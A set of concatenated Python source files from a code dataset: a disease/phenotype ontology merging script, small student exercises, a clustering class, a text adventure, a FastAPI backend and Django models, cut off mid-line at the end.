filter_umls(umls_pairs,sets_with_umls):\n # We've got a bunch of umls pairs, but we really only want to use them if they're not\n # already BOTH attached to a hp or mondo.\n #for s in sets_with_umls:\n # if 'UMLS:C2931082' in s:\n # print(s)\n # if 'MESH:C536004' in s:\n # print(s)\n with open('filtered.txt','w') as ff:\n used = set()\n for s in sets_with_umls:\n used.update(s)\n #if 'UMLS:C2931082' in used:\n # print('umls in used')\n #if 'MESH:C536004' in used:\n # print('mesh in used')\n ok_pairs = []\n for pair in umls_pairs:\n p=list(pair)\n # print(p[0])\n # print(p[1])\n ok = ((p[0] not in used) or (p[1] not in used))\n if ok:\n ok_pairs.append(pair)\n else:\n ff.write(f'{p[0]}\\t{p[1]}\\n')\n return ok_pairs\n\ndef combine_id_sets(l1,l2):\n \"\"\"Given lists of sets, combine them, overlapping sets that are exactly the same\"\"\"\n #print(l1[0])\n #print(type(l1[0]))\n #print(l2[0])\n #print(type(l2[0]))\n s = set( [frozenset(x) for x in l1])\n s2 = set( [frozenset(x) for x in l2])\n s.update(s2)\n return [ set(x) for x in s ]\n\ndef read_badxrefs(pref):\n morebad = defaultdict(list)\n fn = os.path.join(os.path.dirname(os.path.abspath(__file__)),'input_data',f'{pref}_badxrefs.txt')\n with open(fn,'r') as inf:\n for line in inf:\n if line.startswith('#'):\n continue\n x = line.strip().split(' ')\n morebad[x[0]].append(x[1])\n return morebad\n\ndef load_diseases_and_phenotypes():\n print('disease/phenotype')\n print('get and write hp sets')\n bad_mappings = read_bad_hp_mappings()\n more_bad_mappings = read_badxrefs('hpo')\n for h,m in more_bad_mappings.items():\n bad_mappings[h].update(m)\n hpo_sets,labels = build_sets('HP:0000118', ignore_list = ['ICD','NCIT'], bad_mappings = bad_mappings)\n print('filter')\n hpo_sets = filter_out_non_unique_ids(hpo_sets)\n print('ok')\n dump_sets(hpo_sets,'hpo_sets.txt')\n print('get and write mondo sets')\n #MONDO has disease, and its sister disease susceptibility. I'm putting both in disease. Biolink q\n #But! this is a problem right now because there are some things that go in both, and they are getting filtered out\n bad_mondo_mappings = read_badxrefs('mondo')\n mondo_sets_1,labels_1 = build_exact_sets('MONDO:0000001',bad_mondo_mappings)\n mondo_sets_2,labels_2 = build_exact_sets('MONDO:0042489',bad_mondo_mappings)\n mondo_close = get_close_matches('MONDO:0000001')\n mondo_close2 = get_close_matches('MONDO:0042489')\n for k,v in mondo_close2.items():\n mondo_close[k] = v\n dump_sets(mondo_sets_1,'mondo1.txt')\n dump_sets(mondo_sets_2,'mondo2.txt')\n labels.update(labels_1)\n labels.update(labels_2)\n #if we just add these together, then any mondo in both lists will get filtered out in the next step.\n #so we need to put them into a set. You can't put sets directly into a set, you have to freeze them first\n mondo_sets = combine_id_sets(mondo_sets_1,mondo_sets_2)\n mondo_sets = filter_out_non_unique_ids(mondo_sets)\n dump_sets(mondo_sets,'mondo_sets.txt')\n print('get and write umls sets')\n bad_umls = read_badxrefs('umls')\n meddra_umls = read_meddra(bad_umls)\n meddra_umls = filter_umls(meddra_umls,mondo_sets+hpo_sets)\n dump_sets(meddra_umls,'meddra_umls_sets.txt')\n dicts = {}\n #EFO has 3 parts that we want here:\n # Disease\n efo_sets_1,l = build_exact_sets('EFO:0000408')\n labels.update(l)\n #phenotype\n efo_sets_2,l = build_exact_sets('EFO:0000651')\n labels.update(l)\n #measurement\n efo_sets_3,l = build_exact_sets('EFO:0001444')\n labels.update(l)\n efo_sets_a = combine_id_sets(efo_sets_1,efo_sets_2)\n efo_sets = combine_id_sets(efo_sets_a, efo_sets_3)\n efo_sets = filter_out_non_unique_ids(efo_sets)\n dump_sets(efo_sets,'efo_sets.txt')\n print('put it all together')\n print('mondo')\n glom(dicts,mondo_sets,unique_prefixes=['MONDO'])\n dump_dicts(dicts,'mondo_dicts.txt')\n print('hpo')\n glom(dicts,hpo_sets,unique_prefixes=['MONDO'],pref='HP')\n dump_dicts(dicts,'mondo_hpo_dicts.txt')\n print('umls')\n glom(dicts,meddra_umls,unique_prefixes=['MONDO'],pref='UMLS',close={'MONDO':mondo_close})\n dump_dicts(dicts,'mondo_hpo_meddra_dicts.txt')\n print('efo')\n glom(dicts,efo_sets,unique_prefixes=['MONDO'],pref='EFO')\n dump_dicts(dicts,'mondo_hpo_meddra_efo_dicts.txt')\n print('dump it')\n diseases,phenotypes = create_typed_sets(set([frozenset(x) for x in dicts.values()]))\n write_compendium(diseases,'disease.txt','disease',labels)\n write_compendium(phenotypes,'phenotypes.txt','phenotypic_feature',labels)\n\n\ndef create_typed_sets(eqsets):\n \"\"\"Given a set of sets of equivalent identifiers, we want to type each one into\n being either a disease or a phenotypic feature. Or something else, that we may want to\n chuck out here.\n Current rules: If it has a mondo, it's a disease, no matter what else it is\n If it doesn't have a mondo, but it does have an HP, then it's a phenotype\n Otherwise, consult the UMLS to see what it might be\n \"\"\"\n umls_types = read_umls_types()\n diseases = set()\n phenotypic_features = set()\n unknown_types = set()\n for equivalent_ids in eqsets:\n #prefixes = set([ Text.get_curie(x) for x in equivalent_ids])\n prefixes = get_prefixes(equivalent_ids)\n if 'MONDO' in prefixes:\n diseases.add(equivalent_ids)\n elif 'HP' in prefixes:\n phenotypic_features.add(equivalent_ids)\n elif 'UMLS' in prefixes:\n umls_ids = [ Text.un_curie(x) for x in equivalent_ids if Text.get_curie(x) == 'UMLS']\n #if len(umls_ids) > 1:\n # print(umls_ids)\n try:\n semtype = umls_types[umls_ids[0]]\n if semtype in ['Disease or Syndrome','Neoplastic Process','Injury or Poisoning',\n 'Mental or Behavioral Dysfunction','Congenital Abnormality',\n 'Anatomical Abnormality']:\n diseases.add(equivalent_ids)\n elif semtype in ['Finding', 'Pathologic Function', 'Sign or Symptom', 'Acquired Abnormality']:\n phenotypic_features.add(equivalent_ids)\n else:\n #Therapeutic or Preventive Procedure, Laboratory Procedure,Laboratory or Test Result\n #Diagnostic Procedure\n if semtype not in unknown_types:\n #print('What is this UMLS type?')\n #print(semtype,umls_ids[0])\n unknown_types.add(semtype)\n pass\n except Exception as e:\n #print(f'Missing UMLS: {umls_ids[0]}')\n #print(equivalent_ids)\n #Calling it a phenotype\n phenotypic_features.add(equivalent_ids)\n elif 'EFO' in prefixes:\n phenotypic_features.add(equivalent_ids)\n #else:\n # print(prefixes)\n return diseases, phenotypic_features\n\ndef build_exact_sets(iri,bad_mappings = defaultdict(set)):\n prefix = Text.get_curie(iri)\n uber = UberGraph()\n uberres = uber.get_subclasses_and_exacts(iri)\n results = []\n labels = {}\n for k,v in uberres.items():\n #Don't hop ontologies here.\n subclass_prefix = Text.get_curie(k[0])\n if subclass_prefix != prefix:\n continue\n if k[1] is not None and k[1].startswith('obsolete'):\n continue\n dbx = set([ norm(x) for x in v ])\n for bm in bad_mappings[k[0]]:\n if bm in dbx:\n dbx.remove(bm)\n dbx.add(k[0])\n labels[k[0]] = k[1]\n results.append(dbx)\n return results,labels\n\ndef get_close_matches(iri):\n prefix = Text.get_curie(iri)\n uber = UberGraph()\n uberres = uber.get_subclasses_and_close(iri)\n close = {}\n for k,v in uberres.items():\n #Don't hop ontologies here.\n subclass_prefix = Text.get_curie(k[0])\n if subclass_prefix != prefix:\n continue\n if k[1] is not None and k[1].startswith('obsolete'):\n continue\n dbx = set([ norm(x) for x in v ])\n close[k[0]] = dbx\n return close\n\n\ndef norm(curie):\n curie = f'{Text.get_curie(curie).upper()}:{Text.un_curie(curie)}'\n if Text.get_curie(curie) == 'MSH':\n return Text.recurie(curie,'MESH')\n if Text.get_curie(curie) in ['SNOMEDCT_US','SCTID']:\n return Text.recurie(curie,'SNOMEDCT')\n return curie\n\ndef build_sets(iri, ignore_list = ['ICD'], bad_mappings = {}):\n \"\"\"Given an IRI create a list of sets. Each set is a set of equivalent LabeledIDs, and there\n is a set for each subclass of the input iri\"\"\"\n uber = UberGraph()\n uberres = uber.get_subclasses_and_xrefs(iri)\n results = []\n labels = {}\n for k,v in uberres.items():\n if k[1] is not None and k[1].startswith('obsolete'):\n continue\n dbx = set([ norm(x) for x in v if not Text.get_curie(x) in ignore_list ])\n labels[k[0]] = k[1]\n head = k[0]\n dbx.add(head)\n bad_guys = bad_mappings[head]\n dbx.difference_update(bad_guys)\n results.append(dbx)\n return results,labels\n\n\n#THIS is bad.\n# We can't distribute MRCONSO.RRF, and dragging it out of UMLS is a manual process.\n# It's possible we could rebuild using the services, but no doubt very slowly\ndef read_meddra(bad_maps):\n pairs = set()\n mrcon = os.path.join(os.path.dirname(__file__),'input_data', 'MRCONSO.RRF')\n nothandled = set()\n with open(mrcon,'r') as inf:\n for line in inf:\n x = line.strip().split('|')\n if x[1] != 'ENG':\n continue\n if x[2] == 'S':\n continue\n #There is a suppress column. Only go forward if it is 'N' (it can be 'O', 'E', 'Y', all mean suppress)\n if x[16] != 'N':\n continue\n oid = x[10]\n if oid == '':\n oid = x[9]\n source = x[11]\n if source == 'HPO':\n otherid = oid\n elif source == 'MDR':\n otherid = f'MEDDRA:{oid}'\n elif source == 'NCI':\n otherid = f'NCIT:{oid}'\n elif source == 'SNOMEDCT_US':\n otherid = f'SNOMEDCT:{oid}'\n elif source == 'MSH':\n otherid = f'MESH:{oid}'\n elif source in ['LNC','SRC']:\n continue\n else:\n if source not in nothandled:\n #print('not handling source:',source)\n nothandled.add(source)\n continue\n uid = f'UMLS:{x[0]}'\n if uid in bad_maps and otherid == bad_maps[uid]:\n continue\n pairs.add( frozenset({uid,otherid}) )\n return list(pairs)\n\ndef read_umls_types():\n types = {}\n mrsty = os.path.join(os.path.dirname(__file__),'input_data','MRSTY.RRF')\n with open(mrsty,'r') as inf:\n for line in inf:\n x = line.split('|')\n types[x[0]] = x[3]\n return types\n\nif __name__ == '__main__':\n load_diseases_and_phenotypes()\n","sub_path":"babel/disease_phenotype.py","file_name":"disease_phenotype.py","file_ext":"py","file_size_in_byte":12440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46985922","text":"from pprint import pprint\nword = \"it a string a string string\"\ndef histogram_dict(word):\n word = word.split()\n count = {}\n for i in word:\n if i in count:\n count[i] += 1\n else:\n count[i] = 1\n return count\n\ndef histogram_list(str):\n dict = histogram_dict(str)\n output = []\n for i in dict:\n output.append([i, dict[i]])\n return output\n\ndef histogram_tuple(str):\n dict = histogram_dict(str)\n return output.items()\n\ndef histogram_count(str):\n dict = histogram_dict(str)\n output = {}\n for i in dict:\n if dict[i] in output:\n output[dict[i]].append(i)\n else:\n output[dict[i]] = [i]\n output = output.items()\n return output\n\ndef unique_words(hist):\n return len(hist.values())\n\nif __name__ == '__main__':\n val = histogram_list(word)\n # val2 = unique_words(val)\n print(val)\n # print(val2)","sub_path":"Code/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"506861948","text":"class Items(dict):\n\n # Static Lookups\n UNKNOWN = 0\n POKE_BALL = 1\n GREAT_BALL = 2\n ULTRA_BALL = 3\n MASTER_BALL = 4\n POTION = 101\n SUPER_POTION = 102\n HYPER_POTION = 103\n MAX_POTION = 104\n REVIVE = 201\n MAX_REVIVE = 202\n LUCKY_EGG = 301\n INCENSE_ORDINARY = 401\n INCENSE_SPICY = 402\n INCENSE_COOL = 403\n INCENSE_FLORAL = 404\n TROY_DISK = 501\n X_ATTACK = 602\n X_DEFENSE = 603\n X_MIRACLE = 604\n RAZZ_BERRY = 701\n BLUK_BERRY = 702\n NANAB_BERRY = 703\n WEPAR_BERRY = 704\n PINAP_BERRY = 705\n SPECIAL_CAMERA = 801\n INCUBATOR_BASIC_UNLIMITED = 901\n INCUBATOR_BASIC = 902\n POKEMON_STORAGE_UPGRADE = 1001\n ITEM_STORAGE_UPGRADE = 1002\n\n def __init__(self):\n super(dict, self).__init__(self)\n attributes = inspect.getmembers(Items, lambda attr :not(inspect.isroutine(attr)))\n for attr in attributes:\n if attr[0].isupper():\n self[attr[1]] = attr[0]\n","sub_path":"pogo/itemdex.py","file_name":"itemdex.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"29967332","text":"from sklearn.cluster import MeanShift, DBSCAN\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.base import BaseEstimator, ClusterMixin\nfrom sklearn.utils.validation import NotFittedError\n\n\nclass DBShift(BaseEstimator, ClusterMixin):\n \"\"\"Perform DBShift clustering on a vector array.\n\n DBShift is useful for splitting a feature space into regions for\n systematic exploration. Fitting occurs in two stages:\n 1. DBSCAN is performed over the input to identify \"main\n clusters\" and outliers.\n 2. Mean Shift clustering is performed over the DBSCAN\n outliers, to break these up into regions. These \"outlier\n clusters\" are labelled with negative integers.\n\n Prediction is done by kNN against the dataset used in fitting.\n\n Parameters\n ----------\n eps : float\n The `eps` parameter for DBSCAN. If None, `eps` is chosen to\n be the mean of the ranges of the input data dimensions,\n divided by 33.\n\n min_samples : int\n The `min_samples` parameter for DBSCAN. If None,\n `min_samples` is taken to be 1% of the input data.\n\n n_neighbors : int\n The `n_neighbors` (k) parameter for kNN. If None,\n `n_neighbors` is taken to be the same as `min_samples`.\n\n Attributes\n ----------\n labels_ : The cluster labels identified during fitting\n components_ : The vector array input used in fitting\n\n _dbscan : The internal DBSCAN classifier\n _meanshift : The internal Mean Shift classifier\n _knn : The internal KNN classifier\n \"\"\"\n def __init__(self, eps=None, min_samples=None, n_neighbors=None):\n self.eps = eps\n self.min_samples = min_samples\n self.n_neighbors = n_neighbors\n\n self._dbscan = None\n self._meanshift = None\n self._knn = None\n\n self.labels_ = None\n self.components_ = None\n\n def fit(self, X, y=None):\n \"\"\"Perform clustering.\n\n Parameters\n -----------\n X : array-like, shape=[n_samples, n_features]\n Samples to cluster.\n\n y : Ignored\n\n \"\"\"\n # DBSCAN parameters\n if self.eps is not None:\n eps = self.eps\n else:\n eps = (X.max(axis=0) - X.min(axis=0)).mean() / 33\n\n if self.min_samples is not None:\n m = self.min_samples\n else:\n m = X.shape[0] // 100\n\n # Do dbscan\n self._dbscan = DBSCAN(eps=eps, min_samples=m)\n labels = self._dbscan.fit_predict(X)\n\n # Do mean shift if there are outliers (default parameters)\n outliers = X[labels == -1]\n self._meanshift = MeanShift()\n\n if outliers.shape[0]:\n outlier_clusters = self._meanshift.fit_predict(outliers)\n labels[labels == -1] = -1 - outlier_clusters\n\n # Fit KNN\n if self.n_neighbors is not None:\n k = self.n_neighbors\n else:\n k = self._dbscan.min_samples\n\n self._knn = KNeighborsClassifier(n_neighbors=k).fit(X, labels)\n\n # save output\n self.components_ = X\n self.labels_ = labels\n\n return self\n\n def predict(self, X):\n \"\"\"Predict the cluster labels for the provided data using KNN\n\n Parameters\n ----------\n X : array-like, shape (n_query, n_features)\n Test samples.\n\n Returns\n -------\n y : array of shape [n_samples] or [n_samples, n_outputs]\n Cluster labels for each data sample.\n \"\"\"\n if self._knn is None:\n raise NotFittedError\n\n return self._knn.predict(X)\n\n def predict_proba(self, X):\n \"\"\"Return probability estimates for the test data X.\n\n Parameters\n ----------\n X : array-like, shape (n_query, n_features)\n Test samples.\n\n Returns\n -------\n p : array of shape = [n_samples, n_classes], or a list of\n n_outputs of such arrays if n_outputs > 1.\n The class probabilities of the input samples. Classes are\n ordered by lexicographic order.\n \"\"\"\n if self._knn is None:\n raise NotFittedError\n\n return self._knn.predict_proba(X)\n","sub_path":"olac/clusterers.py","file_name":"clusterers.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"227823678","text":"import jieba\nimport wordcloud\nfrom scipy.misc import imread\n\nmk = imread('../../Downloads/timg.jpg')\nf = open('CIIE.txt', 'r')\ntxt = f.read()\nw = wordcloud.WordCloud(width=600, height=600, background_color='white', scale=3,\n font_path='/System/Library/Fonts/Hiragino Sans GB.ttc',\n mask=mk, max_words=1000)\nw.generate(' '.join(jieba.lcut(txt)))\nw.to_file('CIIE.png')\n","sub_path":"CIIE-wordcloud.py","file_name":"CIIE-wordcloud.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"494662692","text":"\nfrom player import Player\nfrom room import Room\nfrom items import Item\nfrom errors import IllegalMoveError, NotEnoughItemsError, IllegalCountError\n\n\ndef create_rooms():\n\t# Declare all the rooms\n\n\troom = {\n\t\t'outside': Room(\n\t\t\t\"Outside Cave Entrance\",\n\t\t\t\"North of you, the cave mount beckons\"\n\t\t),\n\t\t'foyer': Room(\n\t\t\t\"Foyer\",\n\t\t\t\"Dim light filters in from the south. Dusty passages run north and east.\"\n\t\t),\n\t\t'overlook': Room(\n\t\t\t\"Grand Overlook\",\n\t\t\t\"A steep cliff appears before you, falling into the darkness. Ahead to the north, a light flickers in the distance, but there is no way across the chasm.\"\n\t\t),\n\t\t'narrow': Room(\n\t\t\t\"Narrow Passage\",\n\t\t\t\"The narrow passage bends here from west to north. The smell of gold permeates the air.\"\n\t\t),\n\t\t'treasure': Room(\n\t\t\t\"Treasure Chamber\",\n\t\t\t\"You've found the long-lost treasure chamber! Sadly, it has already been completely emptied by earlier adventurers. The only exit is to the south.\"\n\t\t),\n\t}\n\n\t# Link rooms together\n\n\troom['outside'].connect_to(room['foyer'], 'n')\n\troom['foyer'].connect_to(room['overlook'], 'n')\n\troom['foyer'].connect_to(room['narrow'], 'e')\n\troom['narrow'].connect_to(room['treasure'], 'n')\n\n\troom['foyer'].add_items(\n\t\titem=Item('rock', 'A fist-sized rock. Could be used as a weapon in a pinch.'),\n\t\tcount=3,\n\t)\n\troom['outside'].add_items(\n\t\titem=Item('stick', 'A fairly thin branch. Not much use on its own.'),\n\t\tcount=8,\n\t)\n\troom['treasure'].add_items(\n\t\titem=Item('coin', 'The scattered remnants of a once-vast hoard.'),\n\t\tcount=41,\n\t)\n\n\treturn room\n\n\nclass AdventureManager:\n\tdirections = ['n', 's', 'e', 'w']\n\n\tdef __init__(self):\n\t\tself.rooms = create_rooms()\n\t\tself.player = Player(self.rooms['outside'])\n\t\tself.describe_current_room()\n\n\tdef print(self, text: str) -> None:\n\t\t'''\n\t\tPrints something to the screen.\n\t\t\tLater, this might be modified to allow for fancier effects.\n\n\t\tArgs:\n\t\t\ttext (str): text to print\n\t\t'''\n\n\t\tprint(text[0].upper() + text[1:])\n\n\tdef step(self) -> None:\n\t\t'''\n\t\tDoes a step of the game world.\n\t\t'''\n\t\tpass\n\n\tdef get_current_room_summary(self):\n\t\treturn f'You are currently in the {self.player.current_room.name}.'\n\n\tdef get_current_room_description(self):\n\t\treturn self.player.current_room.description\n\n\tdef get_current_room_contents(self):\n\t\treturn self.player.current_room.print_items()\n\n\tdef describe_current_room(self):\n\t\tself.print(self.get_current_room_summary())\n\t\tself.print(self.get_current_room_description())\n\t\tif len(self.player.current_room.items):\n\t\t\tself.print(self.get_current_room_contents())\n\n\tdef examine_item(self, item_name):\n\t\ttry:\n\t\t\titem = self.player.get_item_by_name(item_name)\n\t\t\tself.print(item.description)\n\t\texcept KeyError:\n\t\t\ttry:\n\t\t\t\titem = self.player.current_room.get_item_by_name(item_name)\n\t\t\t\tself.print(item.description)\n\t\t\texcept KeyError:\n\t\t\t\tself.print(f'There\\'s no {item_name} around here.')\n\n\tdef move_player(self, direction: str, direction_name: str = None) -> None:\n\t\t'''\n\t\tMoves the player.\n\n\t\tArgs:\n\t\t\tdirection (str): Direction to move.\n\t\t\tdirection_name (str, optional): The name of the direction you moved.\n\t\t'''\n\n\t\tif direction_name is None:\n\t\t\tdirection_name = direction\n\n\t\ttry:\n\t\t\tself.player.move(direction)\n\n\t\t\tself.print(f'You move {direction_name}...')\n\t\t\tself.describe_current_room()\n\n\t\t\tself.step()\n\n\t\texcept IllegalMoveError:\n\t\t\tself.print(f'You can\\'t move {direction_name}.')\n\n\tdef player_take(self, item_name, count):\n\t\ttry:\n\t\t\titem = self.player.current_room.get_item_by_name(item_name)\n\t\t\tself.player.transfer_items_from(self.player.current_room, item, count=count)\n\t\t\tself.print(f'Picked up {count} of {item_name}.')\n\t\texcept KeyError:\n\t\t\tself.print(f'There\\'s not a {item_name} here!')\n\t\texcept NotEnoughItemsError:\n\t\t\tself.print(f'There aren\\'t enough of {item_name} here to take {count}.')\n\t\texcept IllegalCountError:\n\t\t\tself.print(f'Can\\'t take {count} of an item!')\n\n\tdef player_drop(self, item_name, count):\n\t\ttry:\n\t\t\titem = self.player.get_item_by_name(item_name)\n\t\t\tself.player.transfer_items_to(self.player.current_room, item, count=count)\n\t\t\tself.print(f'Dropped {count} of {item_name}.')\n\t\texcept KeyError:\n\t\t\tself.print(f'You don\\'t have a {item_name}!')\n\t\texcept NotEnoughItemsError:\n\t\t\tself.print(f'You don\\'t have enough of {item_name} to drop {count}.')\n\t\texcept IllegalCountError:\n\t\t\tself.print(f'Can\\'t drop {count} of an item!')\n\n\tdef print_player_inventory(self):\n\t\tself.print(self.player.print_inventory())\n\n\tdef print_player_inventory_count(self, item_name):\n\t\tself.print(f'You are currently holding {self.player.get_item_count_by_name(item_name)}')\n","sub_path":"src/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"326294640","text":"from math import *\nstring = input(\"Enter the input\")\nstring = string.split()\nprint(type(string))\n\ndef add(*args):\n total = 0\n for i in string:\n if i.isdigit():\n print(\"Is Valid Number\")\n print(i)\n total = total + int(i)\n\n return total\n\nprint(add(string))\n\n\n\n\n\n\n\n","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299989162","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom mongo.db import DB\n\napp = FastAPI()\n\norigins = [\n \"http://localhost.tiangolo.com\",\n \"https://localhost.tiangolo.com\",\n \"http://localhost\",\n \"http://localhost:8080\",\n \"https://burakhanaksoy.azurewebsites.net\",\n \"http://burakhanaksoy.azurewebsites.net\"\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\ndb_instance = DB()\ndb = db_instance.get_db('my-db')\n\n\n@app.get(\"/skills\")\nasync def get_skills():\n pipeline = []\n pipeline.append({'$project': {'_id': 0}})\n collection = db.get_collection('skills')\n\n skills = []\n async for record in collection.aggregate(pipeline):\n skills.append(record)\n\n return skills\n\n\n@app.get(\"/articles\")\nasync def get_articles():\n pipeline = []\n pipeline.append({'$project': {'_id': 0}})\n collection = db.get_collection('articles')\n\n articles = []\n async for record in collection.aggregate(pipeline):\n articles.append(record)\n print(articles)\n\n return articles\n\n\n@app.get('/demo')\nasync def demo():\n return 'hi'\n","sub_path":"docker/back/backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"236862190","text":"\"\"\"Sample solutions from various students\"\"\"\n\n# Exercise 1\n\ndef vowelcount (s):\n # function vowelcount takes a string as an argument and returns the number of vowels in the string.\n\n s = s.lower()\n vowels = s.count('a') + s.count('o') + s.count('e') + s.count('u') + s.count('i')\n\n return vowels\n\n\ndef vowelcount(str):\n \"\"\"Count number of vowels in a string\"\"\"\n vowels = 'aeiouAEIOU'\n count = 0\n for i in str:\n if i in vowels:\n count += 1\n return count\n\n# Martin's solution:\ndef vowelcount(s):\n \"\"\"Count vowels in s\"\"\"\n s = s.lower()\n nv = 0\n for v in 'aeiou':\n nv += s.count(v)\n return nv\n\n# Exercise 2\n\ndef metric(x, y):\n \"\"\"Calculate the difference and sum of two numbers x and y and the quotient\n of the difference and sum\"\"\"\n\n d = x - y\n s = x + y\n\n if s == 0:\n print ('the sum is 0 and you can not divide by 0! Ever tried to divide cake by 0 people?')\n return None\n q = d / s\n return q\n\n\n# Martin's solution:\ndef metric(x, y):\n \"\"\"Calculate difference over sum\"\"\"\n d = x - y\n s = x + y\n print('difference is %g, sum is %g' % (d, s))\n if s == 0:\n return 0\n return d / s\n\n\n\n# Exercise 3\n\ndef multtable(n):\n \"Integers table of 1 to n multiplication\"\n\n for x in range(1,n+1):\n #print(x)\n for y in range(1,n+1):\n result=x*y\n #print(y)\n\n if y<n:\n #pass\n print(str(result) + ' ', end='')\n else:\n print(result,end='\\n')\n\n\n#martin's solution:\n\ndef multtable(n):\n \"\"\"Print multiplication table from 1 to n\"\"\"\n for i in range(1, n+1):\n for j in range(1, n+1):\n print(i * j, end=' ')\n print()\n","sub_path":"homework1/homework1_samples.py","file_name":"homework1_samples.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"75607019","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('common', '0001_initial'),\n ('products', '0001_initial'),\n ('purchasing', '0001_initial'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Shipment',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now)),\n ('modified_on', models.DateTimeField(auto_now=True, default=django.utils.timezone.now)),\n ('comments', models.ManyToManyField(blank=True, to='common.Comment')),\n ('images', models.ManyToManyField(blank=True, to='common.Image')),\n ('purchase_order', models.ForeignKey(to='purchasing.PurchaseOrder')),\n ('received_by', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ShipmentLineItem',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now)),\n ('modified_on', models.DateTimeField(auto_now=True, default=django.utils.timezone.now)),\n ('quantity', models.IntegerField()),\n ('shipment', models.ForeignKey(to='receiving.Shipment')),\n ('sku', models.ForeignKey(to='products.Sku')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"apps/receiving/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"90630761","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom profiles.models import SellerProfile, ClientProfile\nfrom django.utils.text import slugify\nfrom django.db.models.signals import post_delete, pre_save\nfrom django.dispatch import receiver\nfrom django.conf import settings\nimport numpy as np\nimport math\nfrom django.core.validators import MaxValueValidator, MinValueValidator, MinLengthValidator, MaxLengthValidator\n# from django.db import models\n# Create your models here.\n\n\ndef upload_location(instance, filename, **kwargs):\n file_path = 'blog/{author_id}/{title}-{filename}'.format(\n author_id=str(instance.author.id), title=str(instance.title), filename=filename\n )\n return file_path\n\n\nclass Categories(models.Model):\n title = models.CharField(max_length=150, unique=True)\n\n def __str__(self):\n return self.title\n\n\nclass Product(models.Model):\n UNITS = (\n ('K', ('Kilogram')),\n ('G', ('Gram')),\n ('L', ('Liter')),\n )\n STOCK_STATUS = (\n ('IN-STOCK', ('IN-STOCK')),\n ('OUT OF STOCK', ('OUT OF STOCK')),\n )\n DELIVERY_DAYS = (\n (1, '1'),\n (2, '2'),\n (3, '3'),\n (4, '4'),\n (5, '5'),\n (6, '6'),\n (7, '7'),\n (8, '8'),\n (9, '9'),\n (10, '10'),\n (11, '11'),\n (12, '12'),\n (13, '13'),\n (14, '14'),\n (15, '15'),\n )\n MAX_DELIVERY_DAYS = (\n (1, '1'),\n (2, '2'),\n (3, '3'),\n (4, '4'),\n (5, '5'),\n (6, '6'),\n (7, '7'),\n (8, '8'),\n (9, '9'),\n (10, '10'),\n (11, '11'),\n (12, '12'),\n (13, '13'),\n (14, '14'),\n (15, '15'),\n )\n unit = models.CharField(max_length=150, choices=UNITS,\n default='K', blank=True, null=True)\n title = models.CharField(max_length=150)\n user = models.ForeignKey(\n User, blank=True, null=True, on_delete=models.CASCADE, default=None)\n description = models.TextField()\n price = models.FloatField()\n quantity = models.IntegerField(default=False, null=True, blank=False)\n minorder = models.IntegerField(\n help_text='Minum Products that want to sell on per order', null=True, default=None, blank=True)\n image = models.ImageField()\n delivery_days = models.IntegerField(\n choices=DELIVERY_DAYS, blank=True, null=True, help_text='Select Minimum Delivery Days')\n max_delivery_days = models.IntegerField(\n choices=MAX_DELIVERY_DAYS, blank=True, null=True, help_text='Select Maximum Delivery Days')\n category = models.ForeignKey(\n Categories, default=1, on_delete=models.CASCADE)\n deal_status = models.BooleanField(\n default=False, help_text='Check this for dispalying on home page')\n deal_price = models.FloatField(\n null=True, blank=True)\n stock_status = models.CharField(max_length=150, choices=STOCK_STATUS,\n default='IN-STOCK')\n slug = models.SlugField(blank=True, unique=True)\n\n def average_rating(self):\n all_ratings = map(lambda x: x.rating, self.review_set.all())\n return np.mean(list(all_ratings))\n\n def __str__(self):\n return self.title\n\n @property\n def get_price(self):\n price = self.price\n return price\n\n @property\n def get_deal_price(self):\n deal_price = self.deal_price\n return deal_price\n\n\ndef pre_save_product_post_receiever(sender, instance, *args, **kwargs):\n if not instance.slug:\n instance.slug = slugify(instance.user.username + 